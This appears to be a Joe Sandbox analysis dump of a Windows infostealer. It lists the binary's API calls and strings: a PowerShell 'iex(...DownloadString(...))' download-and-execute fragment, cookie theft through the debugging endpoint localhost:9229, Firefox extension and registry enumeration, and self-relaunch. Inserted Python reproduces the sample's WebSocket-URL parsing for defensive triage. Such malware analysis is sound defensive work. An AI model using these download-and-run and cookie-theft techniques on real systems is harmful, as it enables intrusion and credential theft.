                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 3c3acca1c84737efce013f581625ac6a0d8fb123dc53955bdb3c33a953cdd126
                            • Instruction ID: acca2ce5d4fd38711a275514d820b747d77b1e31e8908dafc9a324c68e45275c
                            • Opcode Fuzzy Hash: 3c3acca1c84737efce013f581625ac6a0d8fb123dc53955bdb3c33a953cdd126
                            • Instruction Fuzzy Hash: 8AB1603091151A9BCB22EBA8DC49ABF77B9FF84300F094529B81997251EB74DD41CBB1
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,00D772A4), ref: 00D847E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00D847FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00D8480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00D8481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00D8482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00D84840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00D84851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00D84862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00D84873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00D84884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00D84895
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: b0ae30b1ec571d308c6071214b584bacc90e8404878a94ab2ece59bde77bfc69
                            • Instruction ID: 417ddd9cd89179828132232a2d6446c51ffbe5a7060d03169693ea2e7e998a67
                            • Opcode Fuzzy Hash: b0ae30b1ec571d308c6071214b584bacc90e8404878a94ab2ece59bde77bfc69
                            • Instruction Fuzzy Hash: D911527195A718AFCB32EFF8BC1DA453AB8BA0A745305082FF161E2174DAF44019FB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7BE53
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00D7BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00D7BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7BEEB
                            • lstrlen.KERNEL32(')"), ref: 00D7BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 00D7BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00D7BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00D7BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 00D7C00C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 5f4546ffbfd3b0eb57039e3c16e46a238185663c64ee817b2434639ca9962233
                            • Instruction ID: 86289b65b23189fd4e87a78445e1e7abef0281f35114efd9be6a711144099658
                            • Opcode Fuzzy Hash: 5f4546ffbfd3b0eb57039e3c16e46a238185663c64ee817b2434639ca9962233
                            • Instruction Fuzzy Hash: 4A61A431A116199FCB21EFB88C496AE7BB8EF44710F08542BF509D7211EB74C9428BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8184F
                            • lstrlen.KERNEL32(00BE7660), ref: 00D81860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D818C1
                            • lstrlen.KERNEL32(00D94FA0), ref: 00D818D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D818F4
                            • lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D81900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8192F
                            • lstrlen.KERNEL32(00BF8E50), ref: 00D81945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D819A6
                            • lstrlen.KERNEL32(00D94FA0), ref: 00D819B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D819D9
                            • lstrcat.KERNEL32(00000000,00D94FA0), ref: 00D819E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A14
                            • lstrlen.KERNEL32(00BF8E20), ref: 00D81A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81A8B
                            • lstrlen.KERNEL32(00BF8E00), ref: 00D81AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D81AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81B02
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: e1ac5b219d354db904737e92b2c1de512dc337dff35f45cc26271b0591bc572d
                            • Instruction ID: 8a1f1375aed427f52bbf84f2fd48baa10876fa392430027948ec7af5fd53bcb0
                            • Opcode Fuzzy Hash: e1ac5b219d354db904737e92b2c1de512dc337dff35f45cc26271b0591bc572d
                            • Instruction Fuzzy Hash: F1912FB56017079FDB20AFB9DC99A2677FCEF14340B18482EA896C3251DB74E946CB70
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00D747C5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74812
                            • lstrlen.KERNEL32(00D94B60), ref: 00D7481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7483A
                            • lstrcat.KERNEL32(00000000,00D94B60), ref: 00D74846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D748A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D748CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 00D748DC
                            • lstrlen.KERNEL32(?), ref: 00D748F0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D74931
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D749B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D749E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D74A5D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: c45fcf1b88c791d431d845dfe7eeb87ec1ea4c0b50946dace47f66cc0f963117
                            • Instruction ID: 5d994afc0b2b6b41552c23ead74088519663dba729a84dabffb6253ff67d590e
                            • Opcode Fuzzy Hash: c45fcf1b88c791d431d845dfe7eeb87ec1ea4c0b50946dace47f66cc0f963117
                            • Instruction Fuzzy Hash: F9B1A531A5160A9BCB22EFB8D8569AF77B5EF44300F098529F84997211EB70ED058BF1
                            APIs
                              • Part of subcall function 00D690C0: InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D690DF
                              • Part of subcall function 00D690C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00D690FC
                              • Part of subcall function 00D690C0: InternetCloseHandle.WININET(00000000), ref: 00D69109
                            • strlen.MSVCRT ref: 00D692E1
                            • strlen.MSVCRT ref: 00D692FA
                              • Part of subcall function 00D68980: std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                            • strlen.MSVCRT ref: 00D69399
                            • strlen.MSVCRT ref: 00D693E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00D69547
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D69559
                            • lstrcat.KERNEL32(?,?), ref: 00D6956A
                            • lstrcat.KERNEL32(?,00D94B98), ref: 00D6957C
                            • lstrcat.KERNEL32(?,?), ref: 00D6958D
                            • lstrcat.KERNEL32(?,.txt), ref: 00D6959F
                            • lstrlen.KERNEL32(?), ref: 00D695B6
                            • lstrlen.KERNEL32(?), ref: 00D695DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D69614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: aadaf602ea69d632ff25827e78d168cfcfdb53cffa03a195df4f5e8afaed5128
                            • Instruction ID: 6fab598f9d765084e5ce5a5ce0c55a733a1378ad394f2ed30b7e3f8cbd73f836
                            • Opcode Fuzzy Hash: aadaf602ea69d632ff25827e78d168cfcfdb53cffa03a195df4f5e8afaed5128
                            • Instruction Fuzzy Hash: BAE12571E11218DFDF10DFA8D890AEEBBB5BF48310F1444AAE509A7241DB70AE45CFA1
                            APIs
                            • memset.MSVCRT ref: 00D7D9A1
                            • memset.MSVCRT ref: 00D7D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7DA1C
                            • lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7DA36
                            • lstrcat.KERNEL32(?,?), ref: 00D7DA4A
                            • lstrcat.KERNEL32(?,00BFCD80), ref: 00D7DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7DA95
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7DAFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: f293fc10a8e50ec407c2fb06784b40dc7462ca349bfadc90c0fd3195ef5e6308
                            • Instruction ID: f0d2b1fe5f13b2832484b189f0a2639fba20a99b75b44feec224dfaad1acc8d2
                            • Opcode Fuzzy Hash: f293fc10a8e50ec407c2fb06784b40dc7462ca349bfadc90c0fd3195ef5e6308
                            • Instruction Fuzzy Hash: A9B1AF719102199FDB10EFB4CC949EE77B9FF48300F188569E91AE7250EA709E45CBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B3D9
                            • lstrlen.KERNEL32(00D94C50), ref: 00D6B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B474
                            • lstrcat.KERNEL32(00000000,00D94C50), ref: 00D6B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B4A9
                            • lstrlen.KERNEL32(00000000), ref: 00D6B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B587
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D6B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B622
                            • lstrcat.KERNEL32(00000000,00D94AD4), ref: 00D6B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B65E
                            • lstrlen.KERNEL32(?), ref: 00D6B767
                            • lstrlen.KERNEL32(?), ref: 00D6B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6B79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: ecc6c5d50e4fa8e803f0aa50efc141edc3c971cf08efc6b44eb141e57e8bbd51
                            • Instruction ID: bc1f15b153801abf5ed9d0115bf9a190ca18515f59df86201f54ebb425ac7642
                            • Opcode Fuzzy Hash: ecc6c5d50e4fa8e803f0aa50efc141edc3c971cf08efc6b44eb141e57e8bbd51
                            • Instruction Fuzzy Hash: 49023030A016058FCB25DF69D959A6AB7B5FF44314F1D806EE409DB362DB71DC82CBA0
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • RegOpenKeyExA.ADVAPI32(?,00BFB288,00000000,00020019,?), ref: 00D837BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D837F7
                            • wsprintfA.USER32 ref: 00D83822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00D83840
                            • RegCloseKey.ADVAPI32(?), ref: 00D8384E
                            • RegCloseKey.ADVAPI32(?), ref: 00D83858
                            • RegQueryValueExA.ADVAPI32(?,00BFE000,00000000,000F003F,?,?), ref: 00D838A1
                            • lstrlen.KERNEL32(?), ref: 00D838B6
                            • RegQueryValueExA.ADVAPI32(?,00BFDE80,00000000,000F003F,?,00000400), ref: 00D83927
                            • RegCloseKey.ADVAPI32(?), ref: 00D83972
                            • RegCloseKey.ADVAPI32(?), ref: 00D83989
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: a08b4d37947bbad570a5a6aefbdfc5efc00c3f3fd50da71686c02a4a8e48cc56
                            • Instruction ID: 30708a0123d20ff72f12aa43b95dd5a047c74e144b9c84e212a3a2324ca49e70
                            • Opcode Fuzzy Hash: a08b4d37947bbad570a5a6aefbdfc5efc00c3f3fd50da71686c02a4a8e48cc56
                            • Instruction Fuzzy Hash: B0919F729002089FCB10EFA8DD859EEB7B9FB48710F15856AE509A7211D771EE46CFB0
                            APIs
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D690DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00D690FC
                            • InternetCloseHandle.WININET(00000000), ref: 00D69109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00D69166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00D69197
                            • InternetCloseHandle.WININET(00000000), ref: 00D691A2
                            • InternetCloseHandle.WININET(00000000), ref: 00D691A9
                            • strlen.MSVCRT ref: 00D691BA
                            • strlen.MSVCRT ref: 00D691ED
                            • strlen.MSVCRT ref: 00D6922E
                            • strlen.MSVCRT ref: 00D6924C
                              • Part of subcall function 00D68980: std::_Xinvalid_argument.LIBCPMT ref: 00D68996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 11ae683e95bad0fe30866705b9529c9886d2aaebf1b00442e78a83e9d5237510
                            • Instruction ID: 5d0026084e27f8dcf62b5e6d2a40de013319b140c1997c0c03e0a11b8da46c18
                            • Opcode Fuzzy Hash: 11ae683e95bad0fe30866705b9529c9886d2aaebf1b00442e78a83e9d5237510
                            • Instruction Fuzzy Hash: A951E371600209ABEB20DBA8DC45FEEF7F9DF48714F14016AF504E7281DBB4AA4987B5
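The function block above fetches http://localhost:9229/json and carries the strings "webSocketDebuggerUrl": and "ws://. That path is the target list served by a Chromium remote-debugging port and by the Node.js inspector (9229 is the inspector's default port); each entry's webSocketDebuggerUrl is the WebSocket a DevTools client attaches to, so a process that reads it can drive whatever is listening there. The Python below is an added example, not code from this report or from the sample: it reproduces on a constructed /json response the substring extraction those three strings imply, and beside it the JSON-based parse a defender's own tooling would use. The response body, ids and paths are constructed; the exact loop in the binary is not shown in the report, so the scan is an approximation of what the strlen calls and string constants suggest.

```python
import json
from typing import List, Optional

# Constructed sample: the shape of a DevTools/Inspector "GET /json" reply.
# The id, title and file path are made up for this example.
SAMPLE_JSON_RESPONSE = """[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?ws=localhost:9229/11111111-2222-3333-4444-555555555555",
  "id": "11111111-2222-3333-4444-555555555555",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/11111111-2222-3333-4444-555555555555"
} ]
"""

# The two string constants the report lists for this function.
KEY_MARKER = '"webSocketDebuggerUrl":'
WS_MARKER = '"ws://'


def extract_ws_url_by_scan(body: str) -> Optional[str]:
    """Substring scan built from the function's own string constants
    (an approximation of its loop, which the report does not show):
    find the key, then the opening quote of the ws:// value, then the
    closing quote, and return what lies between them."""
    key_at = body.find(KEY_MARKER)
    if key_at < 0:
        return None
    start = body.find(WS_MARKER, key_at + len(KEY_MARKER))
    if start < 0:
        return None
    start += 1                      # step past the opening quote
    end = body.find('"', start)
    if end < 0:
        return None
    return body[start:end]


def extract_ws_urls_by_json(body: str) -> List[str]:
    """What defender-side tooling should do instead: decode the JSON
    and read the field, tolerating a non-list or malformed body."""
    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict) and isinstance(t.get("webSocketDebuggerUrl"), str)]


if __name__ == "__main__":
    print("scan :", extract_ws_url_by_scan(SAMPLE_JSON_RESPONSE))
    print("json :", extract_ws_urls_by_json(SAMPLE_JSON_RESPONSE))
```

The scan deliberately searches for "ws:// only after the key, which is why the ws=localhost:9229/... fragment inside devtoolsFrontendUrl does not produce a false hit. For triage the useful takeaway is the host-side check it implies: nothing on an end-user workstation should normally be serving /json on 9229, so a listener there during this sample's execution is itself a finding.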
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00D816A1
                            • lstrcpy.KERNEL32(00000000,00BEBFB0), ref: 00D816CC
                            • lstrlen.KERNEL32(?), ref: 00D816D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D816F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00D81704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8172A
                            • lstrlen.KERNEL32(00BFA648), ref: 00D8173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D81762
                            • lstrcat.KERNEL32(00000000,00BFA648), ref: 00D8176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D81792
                            • ShellExecuteEx.SHELL32(?), ref: 00D817CD
                            • ExitProcess.KERNEL32 ref: 00D81803
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: b138e256b70c4dce7ba5d23e393ee7f19676df37d13d5060849ef2e1d1f6449c
                            • Instruction ID: 6e5853dc35f03af43c78eebae889f69c31a426836883afa8eaa0be7cf3a9755f
                            • Opcode Fuzzy Hash: b138e256b70c4dce7ba5d23e393ee7f19676df37d13d5060849ef2e1d1f6449c
                            • Instruction Fuzzy Hash: 98518574901619EBDB11EFB4CC84AAEB7FDEF48300F05412AE505E3251EB70AE06DB60
